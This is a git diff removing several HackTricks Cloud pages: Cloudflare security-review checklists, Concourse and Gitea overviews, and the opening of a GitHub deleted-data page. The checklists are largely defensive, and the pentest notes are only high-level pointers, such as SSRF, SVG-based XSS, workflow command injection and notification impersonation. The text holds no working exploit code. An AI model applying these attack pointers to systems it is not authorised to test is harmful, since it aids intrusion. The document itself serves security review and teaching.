style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md deleted file mode 100644 index 05741968d..000000000 --- a/pentesting-ci-cd/cloudflare-security/README.md +++ /dev/null @@ -1,163 +0,0 @@ -# Cloudflare Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -## Websites - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -### Domain Registration - -* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -## Analytics - -_I couldn't find anything to check for a config security review._ - -## Pages - -On each Cloudflare's page: - -* [ ] Check for **sensitive information** in the **`Build log`**. -* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -* [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. - -## **Workers** - -On each Cloudflare's worker check: - -* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - * Check for SSRFs returning the indicated page that you can control - * Check XSSs executing JS inside a svg image - * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. - -{% hint style="warning" %} -Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. -{% endhint %} - -## R2 - -On each R2 bucket check: - -* [ ] Configure **CORS Policy**. - -## Stream - -TODO - -## Images - -TODO - -## Security Center - -* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. - * [ ] Just **check this information** for security misconfigurations and interesting info - -## Turnstile - -TODO - -## **Zero Trust** - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -## Bulk Redirects - -{% hint style="info" %} -Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. -{% endhint %} - -* [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. - -## Notifications - -* [ ] Check the **notifications.** These notifications are recommended for security: - * `Usage Based Billing` - * `HTTP DDoS Attack Alert` - * `Layer 3/4 DDoS Attack Alert` - * `Advanced HTTP DDoS Attack Alert` - * `Advanced Layer 3/4 DDoS Attack Alert` - * `Flow-based Monitoring: Volumetric Attack` - * `Route Leak Detection Alert` - * `Access mTLS Certificate Expiration Alert` - * `SSL for SaaS Custom Hostnames Alert` - * `Universal SSL Alert` - * `Script Monitor New Code Change Detection Alert` - * `Script Monitor New Domain Alert` - * `Script Monitor New Malicious Domain Alert` - * `Script Monitor New Malicious Script Alert` - * `Script Monitor New Malicious URL Alert` - * `Script Monitor New Scripts Alert` - * `Script Monitor New Script Exceeds Max URL Length Alert` - * `Advanced Security Events Alert` - * `Security Events Alert` -* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** - -## Manage Account - -* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - * Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. - -{% hint style="info" %} -Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) -{% endhint %} - -## DDoS Investigation - -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md deleted file mode 100644 index 7eb00f0ba..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ /dev/null @@ -1,159 +0,0 @@ -# Cloudflare Domains - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Overview - -* [ ] Get a feeling of **how much** are the services of the account **used** -* [ ] Find also the **zone ID** and the **account ID** - -### Analytics - -* [ ] In **`Security`** check if there is any **Rate limiting** - -### DNS - -* [ ] Check **interesting** (sensitive?) data in DNS **records** -* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -* [ ] Check for web pages that **aren't** **proxied** -* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -* [ ] Check that **DNSSEC** is **enabled** -* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) - -### **Email** - -TODO - -### Spectrum - -TODO - -### SSL/TLS - -#### **Overview** - -* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -* [ ] The **SSL/TLS Recommender** should be enabled - -#### Edge Certificates - -* [ ] **Always Use HTTPS** should be **enabled** -* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -* [ ] **Minimum TLS Version should be 1.2** -* [ ] **TLS 1.3 should be enabled** -* [ ] **Automatic HTTPS Rewrites** should be **enabled** -* [ ] **Certificate Transparency Monitoring** should be **enabled** - -### **Security** - -* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. -* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -* [ ] In the **`Settings`** section: - * [ ] Check that the **`Security Level`** is **medium** or greater - * [ ] Check that the **`Challenge Passage`** is 1 hour at max - * [ ] Check that the **`Browser Integrity Check`** is **enabled** - * [ ] Check that the **`Privacy Pass Support`** is **enabled** - -#### **CloudFlare DDoS Protection** - -* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - * If the attack is from a **verified bot**, at least **add a rate limit** to bots. - * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - * Check if **Managed rules** could also help to prevent vulnerability exploitations. - * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -* In DDoS you could **override some rules to make them more restrictive**. -* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. -* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** - -### Access - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -### Speed - -_I couldn't find any option related to security_ - -### Caching - -* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** - -### **Workers Routes** - -_You should have already checked_ [_cloudflare workers_](./#workers) - -### Rules - -TODO - -### Network - -* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -* [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** - -### **Traffic** - -TODO - -### Custom Pages - -* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) - -### Apps - -TODO - -### Scrape Shield - -* [ ] Check **Email Address Obfuscation** is **enabled** -* [ ] Check **Server-side Excludes** is **enabled** - -### **Zaraz** - -TODO - -### **Web3** - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md deleted file mode 100644 index 85b037522..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ /dev/null @@ -1,87 +0,0 @@ -# Cloudflare Zero Trust Network - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Analytics - -* [ ] Useful to **get to know the environment** - -### **Gateway** - -* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - * If used, **policies** could be created to **restrict** the access to malicious sites. - * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. - -### Access - -#### Applications - -On each application: - -* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -* [ ] Check the **available identity providers** and make sure they **aren't too open** -* [ ] In **`Settings`**: - * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** - -#### **Access Groups** - -* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. - -#### Service Auth - -* [ ] Check that all service tokens **expires in 1 year or less** - -#### Tunnels - -TODO - -### My Team - -TODO - -### Logs - -* [ ] You could search for **unexpected actions** from users - -### Settings - -* [ ] Check the **plan type** -* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md deleted file mode 100644 index bc438e1de..000000000 --- a/pentesting-ci-cd/concourse-security/README.md +++ /dev/null @@ -1,59 +0,0 @@ -# Concourse Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) - -## Concourse Architecture - -Learn how the concourse environment is structured in: - -{% content-ref url="concourse-architecture.md" %} -[concourse-architecture.md](concourse-architecture.md) -{% endcontent-ref %} - -## Concourse Lab - -Learn how you can run a concourse environment locally to do your own tests in: - -{% content-ref url="concourse-lab-creation.md" %} -[concourse-lab-creation.md](concourse-lab-creation.md) -{% endcontent-ref %} - -## Enumerate & Attack Concourse - -Learn how you can enumerate the concourse environment and abuse it in: - -{% content-ref url="concourse-enumeration-and-attacks.md" %} -[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md deleted file mode 100644 index c2a08a80f..000000000 --- a/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ /dev/null @@ -1,64 +0,0 @@ -# Concourse Architecture - -## Concourse Architecture - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) - -### Architecture - -![](<../../.gitbook/assets/image (187).png>) - -#### ATC: web UI & build scheduler - -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). - -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. - -#### TSA: worker registration & forwarding - -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). - -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. - -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). - -#### Workers - -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). - -* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. - -## References - -* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md deleted file mode 100644 index b5daaad8e..000000000 --- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ /dev/null @@ -1,131 +0,0 @@ -# Basic Gitea Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Structure - -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. - -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. - -A user may also be **part of different teams** with different permissions over different repos. - -And finally **repositories may have special protection mechanisms**. - -## Permissions - -### Organizations - -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. - -**Org admins** (owners) can select the **visibility** of the organization: - -* Public -* Limited (logged in users only) -* Private (members only) - -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. - -When creating a new team, several important settings are selected: - -* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -* It's also indicated **if members can create new repos** (creator will get admin access to it) -* The **permissions** the **members** of the repo will **have**: - * **Administrator** access - * **Specific** access: - -![](<../../.gitbook/assets/image (118).png>) - -### Teams & Users - -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: - -* Administrator -* Write -* Read - -## Gitea Authentication - -### Web Access - -Using **username + password** and potentially (and recommended) a 2FA. - -### **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) - -#### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. - -### **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) - -### Oauth Applications - -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: - -![](<../../.gitbook/assets/image (194).png>) - -### Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} - -Different protections can be applied to a branch (like to master): - -* **Disable Push**: No-one can push to this branch -* **Enable Push**: Anyone with access can push, but not force push. -* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -* **Enable Status checks:** Require status checks to pass before merging. -* **Require approvals**: Indicate the number of approvals required before a PR can be merged. -* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -* **Block merge on official review requests**: If there official review requests it cannot be merged -* **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -* **Require Signed Commits**: Commits must be signed. -* **Block merge if pull request is outdated** -* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md deleted file mode 100644 index 392386866..000000000 --- a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md +++ /dev/null @@ -1,85 +0,0 @@ -# Accessible Deleted Data in Github - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
